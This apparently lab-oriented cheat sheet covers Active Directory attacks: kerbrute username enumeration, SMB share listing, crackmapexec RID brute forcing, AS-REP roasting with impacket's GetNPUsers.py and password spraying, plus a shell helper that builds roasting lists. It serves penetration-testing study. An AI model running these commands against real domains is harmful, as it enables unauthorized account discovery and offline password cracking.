Active Directory

Enumeration

Recon first with a port scanner (nmap or similar). 88 (Kerberos), 139/445 (SMB) and 389/636 (LDAP) open on the same host is a strong sign you are looking at a domain controller; the SMB/LDAP banners usually leak the domain and DC hostname you need for the commands below.

Kerberos & SMB

Try to gather as much info as possible. I usually start by enumerating valid usernames against Kerberos: kerbrute sends AS-REQs and tells valid from invalid accounts apart by the KDC error code, so it does not trigger account lockouts (it is still noisy in the DC's Kerberos logs). If we already know some creds, skip straight to listing shares.

#no user, no creds
kerbrute userenum --dc DC.machine-A.local -d machine-A.local userlist.txt

#with creds (smbclient's -p is the port, not the password; pass the password as user%pass or let it prompt)
smbclient -L \\\\<ip> -U 'user%pass' #list shares
smbclient \\\\10.10.188.12\\Share -U 'user%pass' #specific share

smbmap -u user -p pass -R <share> -H <IP> -P <port> #works better for enum sometimes

smbclient \\\\<ip>\\JuicyShare -U user@domain.local #interactive

Then I check which creds actually work with smbmap, smbclient, or crackmapexec. If the guest account (or a null session) is allowed, crackmapexec can also brute force RIDs over SAMR and hand back the whole list of domain users and groups without any valid creds.

#if guest account is available, no pass, rid bruteforcing
crackmapexec smb DC.machine-A.local -u 'guest' -p '' --rid-brute

Put every (SidTypeUser) entry into a list and try AS-REP roasting: any account with "Do not require Kerberos preauthentication" set will hand back an AS-REP to anyone who asks, and its encrypted part can be cracked offline (hashcat mode 18200 for etype 23).

#no creds: requests an AS-REP for every name in the list, prints hashes for the ones without pre-auth
python impacket/GetNPUsers.py <domain-name>/ -usersfile user.txt -no-pass -dc-ip <dc-ip>
#with creds: asks LDAP which accounts have pre-auth disabled (add -request -format hashcat to also pull the hashes)
python3 impacket/GetNPUsers.py "domain.local/User:Pass"

If any other users turn up, great: you can now try brute forcing or spraying passwords, but only if there is no lockout policy or other anti-brute-force mechanism. Check first (crackmapexec's --pass-pol shows the threshold) and, when lockout is on, spray one password across all users rather than a wordlist against one user. You can also do this with crackmapexec:

#one user against a password list; mind the lockout threshold before running this
crackmapexec smb DC.machine-A.local -u 'DnsAdmins' -p passwordlist
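The step that ties the above together is turning the --rid-brute output into the username list GetNPUsers.py expects. The shell snippet below is an added example and not part of the original notes: the crackmapexec output in SAMPLE is a constructed imitation of the tool's line format (check the regex against a real run), and extract_users / count_users are hypothetical helper names.

```shell
#!/bin/sh
# Added example: build a username list for GetNPUsers.py from
# `crackmapexec smb <dc> -u guest -p '' --rid-brute` output.
# SAMPLE is constructed to mimic the tool's output format, not a real
# capture; diff it against your own run before trusting the regex.
SAMPLE='SMB         10.10.188.12    445    DC               500: MACHINE-A\Administrator (SidTypeUser)
SMB         10.10.188.12    445    DC               501: MACHINE-A\Guest (SidTypeUser)
SMB         10.10.188.12    445    DC               512: MACHINE-A\Domain Admins (SidTypeGroup)
SMB         10.10.188.12    445    DC               513: MACHINE-A\Domain Users (SidTypeGroup)
SMB         10.10.188.12    445    DC               1000: MACHINE-A\DC$ (SidTypeUser)
SMB         10.10.188.12    445    DC               1103: MACHINE-A\j.smith (SidTypeUser)
SMB         10.10.188.12    445    DC               1104: MACHINE-A\svc_backup (SidTypeUser)'

# extract_users: one username per line for every SidTypeUser entry.
# Groups (SidTypeGroup) and aliases are ignored. Machine accounts
# (trailing $) are dropped: they are not what you AS-REP roast or spray
# and only bloat the list. Output is sorted and de-duplicated.
extract_users() {
    printf '%s\n' "$1" \
      | grep 'SidTypeUser' \
      | sed -E 's/.*\\([^\\]+) \(SidTypeUser\).*/\1/' \
      | grep -v '\$$' \
      | sort -u
}

# count_users: how many candidates survive, useful when deciding whether
# a spray fits under the lockout threshold you found with --pass-pol.
count_users() {
    extract_users "$1" | wc -l | tr -d ' '
}

# Usage against a live DC (writes the file GetNPUsers.py -usersfile wants):
#   extract_users "$(crackmapexec smb DC.machine-A.local -u guest -p '' --rid-brute)" > users.txt
#   python3 GetNPUsers.py machine-A.local/ -usersfile users.txt -no-pass -dc-ip <dc-ip>
extract_users "$SAMPLE"
```

Feed the resulting file to GetNPUsers.py -usersfile first; only the names that come back without a hash are worth spending lockout budget on with a password spray.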
